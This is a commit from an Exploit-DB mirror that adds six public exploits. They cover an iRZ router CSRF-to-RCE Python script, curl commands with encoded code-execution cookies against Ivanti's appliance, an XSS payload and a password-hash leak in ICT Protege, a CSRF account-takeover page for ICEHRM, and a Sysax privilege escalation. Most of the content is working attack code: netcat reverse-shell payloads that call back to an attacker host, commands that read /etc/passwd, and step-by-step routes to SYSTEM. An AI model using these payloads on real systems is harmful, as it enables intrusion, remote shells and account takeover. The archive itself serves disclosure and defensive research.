bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2022-03-23

Browse source 
6 changes to exploits/shellcodes

Sysax FTP Automation 6.9.0 - Privilege Escalation
iRZ Mobile Router - CSRF to RCE
Ivanti Endpoint Manager 4.6 - Remote Code Execution (RCE)
ICT Protege GX/WX 2.08 - Stored Cross-Site Scripting (XSS)
ICT Protege GX/WX 2.08 - Client-Side SHA1 Password Hash Disclosure

ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Takeover
This commit is contained in:
Offensive Security 2022-03-23 05:01:38 +00:00
parent 62c4c0421c
commit e55394b7d4
7 changed files with 466 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

157
exploits/hardware/remote/50832.py Executable file
View file

@ -0,0 +1,157 @@
# Exploit Title: iRZ Mobile Router - CSRF to RCE
# Google Dork: intitle:"iRZ Mobile Router"
# Date: 2022-03-18
# Exploit Author: Stephen Chavez & Robert Willis
# Vendor Homepage: https://en.irz.ru/
# Software Link: https://github.com/SakuraSamuraii/ez-iRZ
# Version: Routers through 2022-03-16
# Tested on: RU21, RU21w, RL21, RU41, RL01
# CVE : CVE-2022-27226
import os
import requests
import json
import subprocess
option = "0"
def main():
print("####################################################")
print("# Welcome to IRZ CSRF to RCE Exploit - version 1.0 #")
print("####################################################")
print()
print("## by RedragonX of WHG & rej_ex of SAKURA SAMURAI ##")
print()
print("1. Post Authentication RCE (Needs Credentials)")
print("2. CSRF to RCE (No Credentials)")
print()
runit()
def runit():
option = input("Select an option: ")
if option == "1":
exploit1()
elif option == "2":
exploit2()
else:
print("You must select '1' or '2'. Exiting.")
def exploit1():
print("## Running Post Auth RCE exploit")
print()
print()
router_ip = input("## Enter the router ip to exploit: ")
router_port = int(
input("## Enter the victim router web page port (default is 80): ") or "80")
router_user = input("## Enter the username for the router login: ")
router_pass = input("## Enter the password for the router login: ")
LHOST = input("## Enter the LHOST for the router reverse shell: ")
LPORT = input("## Enter the LPORT for the router reverse shell: ")
router_url = f'http://{router_ip}:{router_port}'
nc1_str = f'Start a listener with the following command: nc -lvp {LPORT}'
input(nc1_str + "\n\nPress enter once you do")
send_json_payload(router_url, router_user, router_pass, LHOST, LPORT)
def send_json_payload(router_url, router_user, router_pass, lhost_ip, lhost_port):
intro = f'Sending the payload to {router_url}\n'
print(intro)
payload_str = '{"tasks":[{"enable":true,"minutes":"*","hours":"*","days":"*","months":"*","weekdays":"*","command":"rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc ' + \
f'{lhost_ip} {lhost_port} ' + \
'>/tmp/f"}],"_board":{"name":"RL21","platform":"irz_mt02","time":"Wed Mar 16 16:43:20 UTC 2022"}}'
payload_json = json.loads(payload_str)
s = requests.Session()
s.auth = (router_user, router_pass)
s.headers.update(
{"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"})
s.headers.update({"X-Requested-With": "XMLHttpRequest"})
s.headers.update({"Origin": router_url})
s.headers.update({"Referer": router_url})
s.post(router_url + "/api/crontab", json=payload_json)
exploit_str = f'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost_ip} 443 >/tmp/f'
print(
"Request sent! You may have to wait about 2 minutes to get a shell. \nFirst shell will die due to crontab job. Start a new listener on a new port [e.g. 443], and run the following command: " + exploit_str)
print("To fix TTY: type telnet 0.0.0.0 in the shell")
def exploit2():
print("## Running CSRF to RCE exploit")
print()
print()
router_ip = input("## Enter the router ip to exploit: ")
router_port = int(
input("## Enter the victim router web page port (default is 80): ") or "80")
LHOST = input("## Enter the LHOST for the router reverse shell: ")
LPORT = input("## Enter the LPORT for the router reverse shell: ")
load_csrf_poc_file(router_ip, router_port, LHOST, LPORT)
def load_csrf_poc_file(router_ip, router_port, lhost_ip, lhost_port):
file_path = os.path.dirname(__file__) + os.sep + "poc.template.html"
if os.path.isfile(file_path):
with open(file_path) as poc_file:
original_poc_data_str = poc_file.read()
new_html = original_poc_data_str.replace("{router_ip}", router_ip)
new_html = new_html.replace(
"{router_port}", str(router_port))
lhost_split_arr = lhost_ip.split(".")
if len(lhost_split_arr) == 4:
new_html = new_html.replace(
"{lhost_ip_octect_1}", lhost_split_arr[0])
new_html = new_html.replace(
"{lhost_ip_octect_2}", lhost_split_arr[1])
new_html = new_html.replace(
"{lhost_ip_octect_3}", lhost_split_arr[2])
new_html = new_html.replace(
"{lhost_ip_octect_4}", lhost_split_arr[3])
new_html = new_html.replace(
"{lhost_port}", lhost_port)
new_file_path = os.path.dirname(
__file__) + os.sep + "poc.new.html"
try:
with open(new_file_path, 'w') as new_file:
new_file.write(new_html)
print()
print(
f'New file written to {new_file_path}. Host this file')
except FileNotFoundError:
print("You had an error writing to the file, doesn't exist.")
else:
print(f'{lhost_ip} is not a proper IPV4 address.')
else:
print(f'{file_path} not found')
main()

116
exploits/hardware/remote/50835.txt Normal file
View file

@ -0,0 +1,116 @@
# Exploit Title: ICT Protege GX/WX 2.08 - Stored Cross-Site Scripting (XSS)
# Exploit Author: LiquidWorm
Vendor: Integrated Control Technology Ltd.
Product web page: https://www.ict.co
Affected version: GX: Ver: 2.08.1002 K1B3
Lib: 04.00.217
Int: 2.3.235.J013
OS: 2.0.20
WX: Ver: 4.00 284 H062
App: 02.08.766
Lib: 04.00.169
Int: 02.2.208
Summary: Protege GX is an enterprise level integrated access control, intrusion
detection and building automation solution with a feature set that is easy to
operate, simple to integrate and effortless to extend. Protege WX is an all-in-one,
web-based, cross-platform system that gives you a fully functional access control
and intrusion detection solution in a fraction of the time of conventional software.
With no software to install, setup is quick and simple. Connect the Controller and
system components, then open a web browser to launch the intuitive wizard-driven
interface which guides you through the process of configuring your system.
Desc: The application suffers from an authenticated stored XSS vulnerability.
The issue is triggered when input passed to the 'Name' parameter is not properly
sanitized before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context of an
affected site.
Tested on: Microsoft-WinCE/6.00
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5699
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5699.php
08.02.2022
--
UI navigation:
--------------
Scheduling > Daylight Savings > (Name field).
Decrypted POST request:
-----------------------
POST /daylightsaving.htm
Command&Type=Submit&SubType=GXT_DAYLIGHTSAVINGS_TBL&DaylightSavingId=1&action=update&Name=ZSL%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&StartMonth=10&EndMonth=2&StartDay=41&EndDay=41&RecId=1
Encrypted GET request:
----------------------
http://CONTROLLER_IP/PRT_CTRL_DIN_ISAPI.dll?8F7FFABE947FEE9C78850F2BA679A3B1645F6378696B32385B56303C43604B48F8CD082303AADCFCECEA082384C860AB16159DADCD89C9A7A2A47EE1F49A7A98AC9A8572882F88FAE5409CF6E06E04DA7F7D10AA6D45525C62B2A62FD949FF00E6B6B7471010908D9A59FBA1D9F304AD8CB24E0CE317A0870AA5A5253F0FCD58CA2BC874AC002CB62422E184FB9F13161C9C00E08F258B8519578EA2793A0C28A4AF51CF65637C0C2F972CE3F49703214A63AA78B3EBE5C720DBE1E9C97E772334EC95480956E27DB6D1DF4489C5D60CCE27D69B388CA6C69A9DC72D85127F870DDA4E459CA245508EBFD66D1C83D9FA12838C1F426E538D5D75192B57DF5AF6
Additional info:
----------------
Databse backup predictable name: Db_D3037E8A_8_Feb_22.bak
The D3037E8A is the serial number of the onboard reader.
Encrypt/Decrypt functions:
--------------------------
From console:
> localStorage.getItem("WXKey")
< '8EDB22D9FB767538'
function encryptAES(a, c) {
a = a.toString();
a = unescape(encodeURIComponent(a));
"undefined" == typeof c && (c = !0);
if (0 == servertype)
return a;
var b = localStorage.getItem("WXKey");
if ("" == b || null == b)
return a;
for (var d = "", e = 0; 16 > e; e++)
d += String.fromCharCode(Math.floor(75 * Math.random() + 48));
a = d + mcrypt.Encrypt(addPKCS7(a), d, b, "rijndael-128", "cbc");
return a = c ? getCookie("SESSID") + strToHex(a) : strToHex(a)
}
function decryptAES(a) {
if (null == a)
return "";
a = a.toString();
if ("<invalid session> < Packet not Init and not encrypted. >" == a)
a = 0 == servertype ? "login.php" : "login.htm",
window.location = a + "?" + Math.random().toString(16).substring(2, 8).toLowerCase();
else if ("<invalid session>" == a.substr(0, 17))
a = 0 == servertype ? "login.php?logout" : "login.htm?logout",
window.location = a + "?" + Math.random().toString(16).substring(2, 8).toLowerCase();
else {
if (0 == servertype)
return a;
var c = localStorage.getItem("WXKey");
if ("" == c)
return a;
a = hexToStr(a);
var b = a.substr(0, 16);
a = a.substr(16, a.length);
a = mcrypt.Decrypt(a, b, c, "rijndael-128", "cbc").replace(/\x00+$/g, "");
a = removePKCS7(a);
return a = decodeURIComponent(escape(a))
}

52
exploits/hardware/remote/50836.txt Normal file
View file

@ -0,0 +1,52 @@
# Exploit Title: ICT Protege GX/WX 2.08 - Client-Side SHA1 Password Hash Disclosure
# Exploit Author: LiquidWorm
Vendor: Integrated Control Technology Ltd.
Product web page: https://www.ict.co
Affected version: GX: Ver: 2.08.1002 K1B3
Lib: 04.00.217
Int: 2.3.235.J013
OS: 2.0.20
WX: Ver: 4.00 284 H062
App: 02.08.766
Lib: 04.00.169
Int: 02.2.208
Summary: Protege GX is an enterprise level integrated access control, intrusion
detection and building automation solution with a feature set that is easy to
operate, simple to integrate and effortless to extend. Protege WX is an all-in-one,
web-based, cross-platform system that gives you a fully functional access control
and intrusion detection solution in a fraction of the time of conventional software.
With no software to install, setup is quick and simple. Connect the Controller and
system components, then open a web browser to launch the intuitive wizard-driven
interface which guides you through the process of configuring your system.
Desc: The application is vulnerable to improper access control that allows an
authenticated operator to disclose SHA1 password hashes (client-side) of other
users/operators.
Tested on: Microsoft-WinCE/6.00
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5700
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5700.php
08.02.2022
--
Navigate to http://CONTROLLER_IP/operator.htm
Source:
<p><label id="OperatorPassword">Password</label><input type="password" id="Password" value="" class="narrow" readonly=""> <input type="button" id="ButtonChangeOperatorPassword" class="narrow" style="float: right; margin-right: 23%; width: auto;" onclick="updatePassword('operator');" data-multiselect="disabled" value="Change Password"></p>
...
...
<input type="hidden" id="pswdsha" value="053e98c13fcbd7df3bf3a220088e19c867dfd4cc">
...

25
exploits/multiple/remote/50833.txt Normal file
View file

@ -0,0 +1,25 @@
# Exploit Title: Ivanti Endpoint Manager 4.6 - Remote Code Execution (RCE)
# Date: 20/03/2022
# Exploit Author: d7x
# Vendor Homepage: https://www.ivanti.com/
# Software Link: https://forums.ivanti.com/s/article/Customer-Update-Cloud-Service-Appliance-4-6
# Version: CSA 4.6 4.5 - EOF Aug 2021
# Tested on: Linux x86_64 # CVE : CVE-2021-44529
# CVE : CVE-2021-44529
###
This is the RCE exploit for the following advisory (officially discovered by Jakub Kramarz):
https://forums.ivanti.com/s/article/SA-2021-12-02?language=en_US
Shoutouts to phyr3wall for providing a hint to where the obfuscated code relies
@d7x_real
https://d7x.promiselabs.net
https://www.promiselabs.net
###
# cat /etc/passwd
curl -i -s -k -X $'GET' -b $'e=ab; exec=c3lzdGVtKCJjYXQgL2V0Yy9wYXNzd2QiKTs=; pwn=; LDCSASESSID=' 'https://.../client/index.php' | tr -d "\n" | grep -zPo '<c123>\K.*?(?=</c123>)'; echo
# sleep for 10 seconds
curl -i -s -k -X $'GET' -b $'e=ab; exec=c2xlZXAoMTApOw==; pwn=; LDCSASESSID=' 'https://.../client/index.php' | tr -d "\n" | grep -zPo '<c123>\K.*?(?=</c123>)'; echo

73
exploits/php/webapps/50831.txt Normal file
View file

@ -0,0 +1,73 @@
# Exploit Title: ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Takeover
# Date: 18/03/2022
# Exploit Author: Devansh Bordia
# Vendor Homepage: https://icehrm.com/
# Software Link: https://github.com/gamonoid/icehrm/releases/tag/v31.0.0.OS
# Version: 31.0.0.OS
#Tested on: Windows 10
1. About - ICEHRM
IceHrm employee management system allows companies to centralize confidential employee information and define access permissions to authorized personnel to ensure that employee information is both secure and accessible.
2. Description:
The application has an update password feature which has a CSRF vulnerability that allows an attacker to change the password of any arbitrary user leading to an account takeover.
3. Steps To Reproduce:
- Create an User name:Gaurav with permission of the Employee using the Admin User of the application and set his password.
- Now login into the application using his credentials and navigate to Update Password Feature to change the password.
- Intercept the request in Proxy and we can see there is a GET request used to change password and also NO CSRF Token is being used.
- Finally using Burpsuite create CSRF POC and save it as exploit.html.
- Now change the password in the POC to any password we want.
- Finally we open this POC in the same browser session and click on the submit button.
- At last when retrying to login into the application we can see that password has been reset for the account leading to account takeover.
4. Vulnerable Request:
GET
/app/service.php?t=Employee&a=ca&sa=changePassword&mod=modules=employees&req={"current":"Test@123
","pwd":"Dummy@123"} HTTP/1.1
Host: localhost:8070
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0)
Gecko/20100101 Firefox/98.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer:
http://localhost:8070/app/?g=modules&n=employees&m=module_Personal_Information
Cookie: PHPSESSID=k8d27ve456j0jb56ga885j1vvb
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
5. Exploit POC (exploit.html)
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8070/app/service.php">
<input type="hidden" name="t" value="Employee" />
<input type="hidden" name="a" value="ca" />
<input type="hidden" name="sa" value="changePassword" />
<input type="hidden" name="mod" value="modules&#61;employees" />
<input type="hidden" name="req"
value="&#123;"current"&#58;"Test&#64;123"&#44;"pwd"&#58;"Dummy&#64;123"&#125;"
/>
<input type="submit" value="Submit request" />
</form>
</body>
</html>

37
exploits/windows/local/50834.txt Normal file
View file

@ -0,0 +1,37 @@
# Exploit Author: bzyo (@bzyo_)
# Exploit Title: Sysax FTP Automation 6.9.0 - Privilege Escalation
# Date: 03-20-2022
# Vulnerable Software: Sysax FTP Automation 6.9.0
# Vendor Homepage: https://www.sysax.com/
# Version: 6.9.0
# Software Link: https://www.sysax.com/download/sysaxauto_setup.msi
# Tested on: Windows 10 x64
# Details:
Sysax Scheduler Service runs as Local System. By default the application allows for low privilege users to create/run backup jobs other than themselves. By removing the option to run as current user or another, the task will run as System. A low privilege user could abuse this and escalate their privileges to local system.
# Prerequisites:
To successfully exploit this vulnerability, an attacker must already have local access to a system running Sysax FTP Automation using a low privileged user account
# Exploit:
Logged in as low privileged account
1. Create folder c:\temp
2. Download netcat (nc.exe) to c:\temp
3. Create file 'pwn.bat' in c:\temp with contents
c:\temp\nc.exe localhost 1337 -e cmd
4. Open command prompt and netcat listener
nc -nlvvp 1337
5. Open sysaxschedscp.exe from C:\Program Files (x86)\SysaxAutomation
6. Select Setup Scheduled/Triggered Tasks
- Add task (Triggered)
- Update folder to monitor to be c:\temp
- Check 'Run task if a file is added to the monitor folder or subfolder(s)'
- Choose 'Run any other Program' and choose c:\temp\pwn.bat
- Uncheck 'Login as the following user to run task'
- Finish and Save
7. Create new text file in c:\temp
8. Check netcat listener
C:\WINDOWS\system32>whoami
whoami
nt authority\system

6
files_exploits.csv
View file

@ -11472,6 +11472,7 @@ id,file,description,date,author,type,platform,port
50818,exploits/windows/local/50818.txt,"WOW21 5.0.1.9 - 'Service WOW21_Service' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows,
50819,exploits/windows/local/50819.txt,"Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows,
50824,exploits/windows/local/50824.txt,"VIVE Runtime Service - 'ViveAgentService' Unquoted Service Path",1970-01-01,"Faisal Alasmari",local,windows,
50834,exploits/windows/local/50834.txt,"Sysax FTP Automation 6.9.0 - Privilege Escalation",1970-01-01,bzyo,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@ -18650,6 +18651,10 @@ id,file,description,date,author,type,platform,port
50821,exploits/hardware/remote/50821.py,"Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)",1970-01-01,"Aryan Chehreghani",remote,hardware,
50822,exploits/multiple/remote/50822.txt,"Tdarr 2.00.15 - Command Injection",1970-01-01,"Sam Smith",remote,multiple,
50829,exploits/multiple/remote/50829.py,"Apache APISIX 2.12.1 - Remote Code Execution (RCE)",1970-01-01,Ven3xy,remote,multiple,
50832,exploits/hardware/remote/50832.py,"iRZ Mobile Router - CSRF to RCE",1970-01-01,"John Jackson",remote,hardware,
50833,exploits/multiple/remote/50833.txt,"Ivanti Endpoint Manager 4.6 - Remote Code Execution (RCE)",1970-01-01,d7x,remote,multiple,
50835,exploits/hardware/remote/50835.txt,"ICT Protege GX/WX 2.08 - Stored Cross-Site Scripting (XSS)",1970-01-01,LiquidWorm,remote,hardware,
50836,exploits/hardware/remote/50836.txt,"ICT Protege GX/WX 2.08 - Client-Side SHA1 Password Hash Disclosure",1970-01-01,LiquidWorm,remote,hardware,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@ -44896,5 +44901,6 @@ id,file,description,date,author,type,platform,port
50823,exploits/multiple/webapps/50823.txt,"Baixar GLPI Project 9.4.6 - SQLi",1970-01-01,"Prof. Joas Antonio",webapps,multiple,
50825,exploits/php/webapps/50825.py,"Moodle 3.11.5 - SQLi (Authenticated)",1970-01-01,"Chris Anastasio",webapps,php,
50826,exploits/php/webapps/50826.py,"Pluck CMS 4.7.16 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Ashish Koli",webapps,php,
50831,exploits/php/webapps/50831.txt,"ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Takeover",1970-01-01,"Devansh Bordia",webapps,php,
50828,exploits/php/webapps/50828.sh,"Tiny File Manager 2.4.6 - Remote Code Execution (RCE)",1970-01-01,"FEBIN MON SAJI",webapps,php,
50830,exploits/php/webapps/50830.txt,"Wordpress Plugin iQ Block Country 1.2.13 - Arbitrary File Deletion via Zip Slip (Authenticated)",1970-01-01,"Ceylan BOZOĞULLARINDAN",webapps,php,

Can't render this file because it is too large.